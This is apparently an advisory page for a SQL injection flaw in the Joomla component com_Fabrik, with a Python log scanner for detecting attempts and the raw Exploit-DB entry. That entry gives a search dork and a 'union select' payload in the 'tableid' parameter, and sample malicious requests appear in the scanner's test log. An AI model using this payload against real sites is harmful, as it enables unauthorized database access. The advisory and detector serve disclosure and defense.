Vendor: Joomla Component (com_Fabrik)
By: Mkr0x
CVSS: 8.8 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Joomla Component (com_Fabrik)
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Joomla Component (com_Fabrik) SQL Injection Vulnerability

A SQL injection vulnerability exists in the Joomla component com_Fabrik that allows an attacker to execute arbitrary SQL commands on the vulnerable system. The vulnerability is due to insufficient sanitization of user-supplied input in the 'tableid' parameter of the 'index.php' script (option=com_fabrik, view=table). An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL commands to the vulnerable system. Successful exploitation can result in unauthorized access to sensitive information, modification of data, and other malicious activity.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to apply the patch as soon as possible.
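As an added defender-side example (not part of this advisory or of Fabrik's own code), the following Python scans web-server access-log lines for com_fabrik requests whose tableid parameter is not a plain integer, on the assumption that a legitimate tableid is numeric; the log lines and client addresses are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (common log format), not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2020:12:00:01 +0000] "GET /index.php?option=com_fabrik&view=table&tableid=13 HTTP/1.1" 200 5120
203.0.113.5 - - [10/Mar/2020:12:00:07 +0000] "GET /index.php?option=com_fabrik&view=table&tableid=13+union+select+1-- HTTP/1.1" 200 913
203.0.113.9 - - [10/Mar/2020:12:00:09 +0000] "GET /index.php?option=com_fabrik&view=table&tableid=13%27%20OR%201%3D1 HTTP/1.1" 500 211
198.51.100.2 - - [10/Mar/2020:12:00:11 +0000] "GET /index.php?option=com_content&view=article&id=7 HTTP/1.1" 200 4410
"""

# Pulls the request line ("METHOD path HTTP/x.y") out of a log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')


def tableid_values(request_path):
    """Return the URL-decoded tableid values of a com_fabrik request, else []."""
    parts = urlsplit(request_path)
    qs = parse_qs(parts.query, keep_blank_values=True)  # decodes %xx and '+'
    if qs.get("option") != ["com_fabrik"]:
        return []
    return qs.get("tableid", [])


def is_suspicious_tableid(value):
    """Assumption: a legitimate tableid is a plain integer; anything else is flagged."""
    return not value.isdigit()


def scan_log(text):
    """Return (client_ip, decoded_tableid) for every request with a non-integer tableid."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        client_ip = line.split(" ", 1)[0]
        for value in tableid_values(m.group("path")):
            if is_suspicious_tableid(value):
                findings.append((client_ip, value))
    return findings


if __name__ == "__main__":
    for ip, value in scan_log(SAMPLE_LOG):
        print(f"suspicious tableid from {ip}: {value!r}")
```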
Source

Exploit-DB raw data:

$##################################################################$
# +==============================================================+ 
# | Joomla Component (com_Fabrik) SQL Injection Vulnerability  | 
# +==============================================================+ 
# Vendor : http://fabrikar.com/
# Author : Mkr0x                                            
# Home : www.kernel.ge
# E-mail : mkrcard@gmail.com
# Place : Georgia
$##################################################################$
# Dork : 
 index.php?option=com_fabrik
--
# Vulnerable : 
 http://[target]/index.php?option=com_fabrik&view=table&tableid=[SQL]
--
# Exploit : 
 http://[target]/index.php?option=com_fabrik&view=table&tableid=13+union+select+1--
--

 Best Regards 
  -Mkr0x-

# „Georgia has always been at the foreground“ .. 
$##################################################################$